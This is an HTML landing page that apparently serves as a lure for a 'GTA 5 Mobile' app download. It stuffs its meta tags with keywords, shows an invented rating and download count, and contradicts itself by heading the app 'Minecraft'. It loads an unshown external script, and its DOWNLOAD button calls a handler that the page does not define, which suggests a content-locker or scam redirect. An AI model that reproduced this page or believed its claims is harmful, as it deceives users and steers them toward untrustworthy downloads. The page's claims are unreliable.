<!DOCTYPE html><html lang="en"><head>
</head><body>
<script type="text/javascript">
    var CmAwY_iqn_ZwQAac={"it":4384041,"key":"b4775"};
</script>
<script src="https://d9cshxmf0qazr.cloudfront.net/341562c.js"></script>

    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1">
    <title>GTA 5 Mobile</title>
	<meta name="description" content=" Experience the thrill of GTA 5 mobile! Join the virtual battlefield and download the game to unleash your skills in epic campus battles. Are you ready for the ultimate gaming adventure? Download GTA 5 mobile now and conquer the campus chaos!">
	<meta name="keywords" content="GTA 5 mobile game, GTA 5 mobile apk, GTA 5 mobile ios, download GTA 5 mobile, modcombo GTA 5 mobile, GTA 5 mobile online, GTA 5 mobile video, games like GTA 5 mobile, download GTA 5 mobile mod apk, GTA 5 mobile android, GTA 5 mobile app, GTA 5 mobile apple, GTA 5 mobile apk techloky, GTA 5 mobile android mod apk, GTA 5 mobile apk girl version, GTA 5 mobile all pictures, GTA 5 mobile apk v1.4.1, GTA 5 mobile android apk download, apk GTA 5 mobile, apk GTA 5 mobile mod, apk GTA 5 mobile android, android4game.com apk GTA 5 mobile, apktodo GTA 5 mobile, apkrabi.com GTA 5 mobile, and play GTA 5 mobile, apksum GTA 5 mobile, apk GTA 5 mobile 2, GTA 5 mobile boss, GTA 5 mobile cheat, GTA 5 mobile cheat apk, GTA 5 mobile game ios, GTA 5 mobile free, GTA 5 mobile download, GTA 5 mobile download ios, GTA 5 mobile download apk, GTA 5 mobile download android, GTA 5 mobile download for iphone, GTA 5 mobile download at techloky.com, download game college 
rawl, download GTA 5 mobile ios, download game GTA 5 mobile apk, download game GTA 5 mobile mod apk, download GTA 5 mobile mod apk no sensor, GTA 5 mobile for ios, GTA 5 mobile fight, GTA 5 mobile free download ios, free download GTA 5 mobile, free download GTA 5 mobile mod apk">
    <meta name="robots" content="index, follow">
	<link rel="shortcut icon" type="image/png" href="images/favicon-32x32.png">
    <link rel="stylesheet" href="css/bootstrap-icons.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link href="https://fonts.googleapis.com/css2?family=Kanit&amp;display=swap" rel="stylesheet">

<style>
/* @import url('https://fonts.googleapis.com/css2?family=Inter+Tight:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&family=Noto+Kufi+Arabic:wght@100;200;300;400;500;600;700;800;900&display=swap'); */
    /* @import url('https://fonts.googleapis.com/css2?family=Inter+Tight:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&family=Noto+Kufi+Arabic:wght@100;200;300;400;500;600;700;800;900&display=swap'); */
    body {background-color: #222736;font-family: 'Kanit', sans-serif;}
    * {box-sizing: border-box;}
    .bg {padding: 20px;}
    .main {box-shadow: 0 3px 20px 0 rgba(0, 0, 0, 0.15);background: #2a3042;padding: 25px;max-width: 420px;margin: 20px auto;border-radius: 15px;text-align: center;}
    .logo {width: 120px;height: 120px;border-radius: 10px;}
    h1 {font-weight: bold;color: #f6f6f6;margin: 0;}
    h2 {color: #1ac6ff;}
    button {all: unset;background-color: #1ac6ff;color: #fff;padding: 10px 30px;border-radius: 20px;animation: zoom-in-zoom-out 1s ease infinite;margin-top: 15px;}
    p {color: #a6b0cf;margin: 0;}
    .br {border-top: 2px solid rgba(0, 0, 0, 0.15);margin: 16px 0;}
    .app-step-pr {display: flex;justify-content: center;color: #a6b0cf;align-items: center;margin: 10px 0 5px 0;}
    .aspr-sep {background-color: rgba(0, 0, 0, 0.3); height: 15px;width: 1px;margin: 0 10px;}
    .d-none {display: none;}
    .w-100 {width: 100%;}
h2 {margin: 0;}

.time-c {font-size:.8rem;margin-top:2px;color:#ddd;}
.time-c i {margin-right:5px;}

    @keyframes zoom-in-zoom-out {
  0% {
    transform: scale(1, 1);
  }
  50% {
    transform: scale(1.1, 1.1);
  }
  100% {
    transform: scale(1, 1);
  }
}
  </style>




    <div class="bg">
        <div class="main">
            <img class="logo" src="https://ae01.alicdn.com/kf/HTB1bo80IFXXXXcfXFXXq6xXFXXXd/High-quality-GTA-V-Grand-Theft-Auto-V-Logo-Rockstar-Games-100-Cotton-Casual-Fashion-Loose.jpg">
                <div class="app-step-pr">
                <div class="app-step-platforms"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-android2" viewBox="0 0 16 16">
  <path d="m10.213 1.471.691-1.26q.069-.124-.048-.192-.128-.057-.195.058l-.7 1.27A4.8 4.8 0 0 0 8.005.941q-1.032 0-1.956.404l-.7-1.27Q5.281-.037 5.154.02q-.117.069-.049.193l.691 1.259a4.25 4.25 0 0 0-1.673 1.476A3.7 3.7 0 0 0 3.5 5.02h9q0-1.125-.623-2.072a4.27 4.27 0 0 0-1.664-1.476ZM6.22 3.303a.37.37 0 0 1-.267.11.35.35 0 0 1-.263-.11.37.37 0 0 1-.107-.264.37.37 0 0 1 .107-.265.35.35 0 0 1 .263-.11q.155 0 .267.11a.36.36 0 0 1 .112.265.36.36 0 0 1-.112.264m4.101 0a.35.35 0 0 1-.262.11.37.37 0 0 1-.268-.11.36.36 0 0 1-.112-.264q0-.154.112-.265a.37.37 0 0 1 .268-.11q.155 0 .262.11a.37.37 0 0 1 .107.265q0 .153-.107.264M3.5 11.77q0 .441.311.75.311.306.76.307h.758l.01 2.182q0 .414.292.703a.96.96 0 0 0 .7.288.97.97 0 0 0 .71-.288.95.95 0 0 0 .292-.703v-2.182h1.343v2.182q0 .414.292.703a.97.97 0 0 0 .71.288.97.97 0 0 0 .71-.288.95.95 0 0 0 .292-.703v-2.182h.76q.436 0 .749-.308.31-.307.311-.75V5.365h-9zm10.495-6.587a.98.98 0 0 0-.702.278.9.9 0 0 0-.293.685v4.063q0 .406.293.69a.97.97 0 0 0 .702.284q.42 0 .712-.284a.92.92 0 0 0 .293-.69V6.146a.9.9 0 0 0-.293-.685 1 1 0 0 0-.712-.278m-12.702.283a1 1 0 0 1 .712-.283q.41 0 .702.283a.9.9 0 0 1 .293.68v4.063a.93.93 0 0 1-.288.69.97.97 0 0 1-.707.284 1 1 0 0 1-.712-.284.92.92 0 0 1-.293-.69V6.146q0-.396.293-.68"/>
</svg> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-apple" viewBox="0 0 16 16">
  <path d="M11.182.008C11.148-.03 9.923.023 8.857 1.18c-1.066 1.156-.902 2.482-.878 2.516s1.52.087 2.475-1.258.762-2.391.728-2.43m3.314 11.733c-.048-.096-2.325-1.234-2.113-3.422s1.675-2.789 1.698-2.854-.597-.79-1.254-1.157a3.7 3.7 0 0 0-1.563-.434c-.108-.003-.483-.095-1.254.116-.508.139-1.653.589-1.968.607-.316.018-1.256-.522-2.267-.665-.647-.125-1.333.131-1.824.328-.49.196-1.422.754-2.074 2.237-.652 1.482-.311 3.83-.067 4.56s.625 1.924 1.273 2.796c.576.984 1.34 1.667 1.659 1.899s1.219.386 1.843.067c.502-.308 1.408-.485 1.766-.472.357.013 1.061.154 1.782.539.571.197 1.111.115 1.652-.105.541-.221 1.324-1.059 2.238-2.758q.52-1.185.473-1.282"/>
  <path d="M11.182.008C11.148-.03 9.923.023 8.857 1.18c-1.066 1.156-.902 2.482-.878 2.516s1.52.087 2.475-1.258.762-2.391.728-2.43m3.314 11.733c-.048-.096-2.325-1.234-2.113-3.422s1.675-2.789 1.698-2.854-.597-.79-1.254-1.157a3.7 3.7 0 0 0-1.563-.434c-.108-.003-.483-.095-1.254.116-.508.139-1.653.589-1.968.607-.316.018-1.256-.522-2.267-.665-.647-.125-1.333.131-1.824.328-.49.196-1.422.754-2.074 2.237-.652 1.482-.311 3.83-.067 4.56s.625 1.924 1.273 2.796c.576.984 1.34 1.667 1.659 1.899s1.219.386 1.843.067c.502-.308 1.408-.485 1.766-.472.357.013 1.061.154 1.782.539.571.197 1.111.115 1.652-.105.541-.221 1.324-1.059 2.238-2.758q.52-1.185.473-1.282"/>
</svg></div>
                <div class="aspr-sep"></div>
                <div class="app-step-rating">
                  <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-star-fill" viewBox="0 0 16 16">
  <path d="M3.612 15.443c-.386.198-.824-.149-.746-.592l.83-4.73L.173 6.765c-.329-.314-.158-.888.283-.95l4.898-.696L7.538.792c.197-.39.73-.39.927 0l2.184 4.327 4.898.696c.441.062.612.636.282.95l-3.522 3.356.83 4.73c.078.443-.36.79-.746.592L8 13.187l-4.389 2.256z"/>
</svg>
                  <span id="app-step-rating-val">4.5</span>
                </div>
                <div class="aspr-sep aspr-sep-2"></div>
                <div class="app-step-downloads">
                    <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-cloud-download" viewBox="0 0 16 16">
  <path d="M4.406 1.342A5.53 5.53 0 0 1 8 0c2.69 0 4.923 2 5.166 4.579C14.758 4.804 16 6.137 16 7.773 16 9.569 14.502 11 12.687 11H10a.5.5 0 0 1 0-1h2.688C13.979 10 15 8.988 15 7.773c0-1.216-1.02-2.228-2.313-2.228h-.5v-.5C12.188 2.825 10.328 1 8 1a4.53 4.53 0 0 0-2.941 1.1c-.757.652-1.153 1.438-1.153 2.055v.448l-.445.049C2.064 4.805 1 5.952 1 7.318 1 8.785 2.23 10 3.781 10H6a.5.5 0 0 1 0 1H3.781C1.708 11 0 9.366 0 7.318c0-1.763 1.266-3.223 2.942-3.593.143-.863.698-1.723 1.464-2.383"/>
  <path d="M7.646 15.854a.5.5 0 0 0 .708 0l3-3a.5.5 0 0 0-.708-.708L8.5 14.293V5.5a.5.5 0 0 0-1 0v8.793l-2.146-2.147a.5.5 0 0 0-.708.708z"/>
</svg>
                <span id="app-step-downloads-val">9M+</span>
                </div>
            </div>
            <h1>Minecraft</h1>
            <p>GTA 5 Mobile Last Version</p>
            <div class="br"></div>
            <h2>App is ready</h2>
            <p>Click on the button below to begin the download of the app.</p>
            <button onclick="_aj()" class="btn-down">DOWNLOAD</button>
        </div>
    </div>
    

</body></html>